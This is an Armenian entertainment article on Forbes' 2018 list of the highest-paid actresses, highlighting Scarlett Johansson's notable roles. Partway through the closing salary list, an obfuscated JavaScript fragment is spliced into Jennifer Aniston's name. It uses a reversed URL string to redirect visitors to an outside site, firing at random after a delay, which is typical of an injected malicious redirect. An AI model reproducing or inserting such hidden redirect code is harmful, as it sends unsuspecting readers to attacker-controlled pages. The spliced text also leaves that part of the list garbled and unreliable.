Հոլիվուդի ամենաբարձր վճարվող դերասանուհու լավագույն դերերը

Հեղինակավոր Forbes ամսագիրը հրապարակել է «2018 թվականի ամենաբարձր վճարվող տասը դերասանուհիների ցուցակը»: Զարմանալի է, որ անցած տարվա առաջատարը՝ ըստ 2017 թվականի «Օսկար» մրցանակաբաշխության վարկածի լավագույն դերասանուհի Էմմա Սթոունը չի ընդգրկված այս ցուցակում:

Ցուցակի առաջին տեղում Սկարլետ Յոհանսսոնն է, որ վաստակում է այնքան, որքան մնացած մարդիկ չեն վաստակում նույնիսկ ողջ կյանքի ընթացքում: Դերասանուհու տարեկան եկամուտը կազմում է 40,5 միլիոն դոլար: Երկրորդ տեղում հայտնվել է Անջելինա Ջոլին՝ շնորհիվ այն կանխավճարի, որ նա ստացել է «Մալեֆիսենտա-2» ֆիլմում նկարահանվելու համար:

Ահա, թե որ դերերն են օգնել Սկարլետ Յոհանսսոնին հայտնվելու առաջին տասնյակում և դառնալու Հոլիվուդի ամենաբարձր վարձատրվող դերասանուհին:

«Վրիժառուներ» (Avengers), 2012-2018

Դերակատարությունը 2018 թվականի ամենասպասված` «Վրիժառուներ. Անսահմանության պատերազմը» ֆիլմում Սկարլետի համար եղավ ամենաշահաբերը: Խաղալով Սև այրի Նատաշա Ռոմանոֆֆի դերը, Յոհանսսոնը, ըստ պաշտոնական տվյալների միայն, ստացավ 20 միլիոն դոլար:

«Վիկի, Քրիստինա, Բարսելոնա» (Vicky, Cristina, Barcelona), 2008

Սկարլետին մեծ ճանաչում բերեց թեթևամիտ Քրիստինայի դերը Վուդի Ալլենի «Վիկի, Քրիստինա, Բարսելոնա» ֆիլմում: Նկատենք, որ սա ռեժիսորի և դերասանուհու առաջին համատեղ աշխատանքը չէր, իսկ Ալլենի մուսայի համբավ ունենալը Հոլիվուդում համարվում է անհավատալի պատիվ և հաջողություն:

«Եղիր իմ կաշվի մեջ» (Under the Skin), 2013

Ռոմանտիկ հերոսուհիների մի շարք դերերից հետո, այնպիսի ֆիլմերում, ինչպիսին են «Սենսացիա», «Մատչ-փոյնտ», «Թարգմանության դժվարություններ» և վերոհիշյալ «Վիկի, Քրիստինա, Բարսելոնա», ռեժիսորները դադարեցին Յոհանսսոնին լուրջ դերասանուհի ընկալել: Սակայն Սկարլետը կարողացավ ապացուցել դրամատիկական դերեր ևս կատարելու իր ունակությունը, խաղալով «Եղիր իմ կաշվի մեջ» կինոնկարում:

«Ֆորբսի» 2018 թվականի ամենաբարձր վարձատրվող դերասանուհիների լրիվ ցուցակը.

Scarlett Johansson  $40.5 million, Angelina Jolie  $28 million, Jennifer Anistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton  $ 19.5 million, Jennifer Lawrence  $ 18.5 million, Reese Witherspoon  $16.5 million, Mila Kunis  $16 million, Julia Roberts  $13 million, Cate Blanchett  $12.5 million, Melissa McCarthy  $12 million, Gal Gadot  $10 million։

Աղբյուր՝ kinoashxarh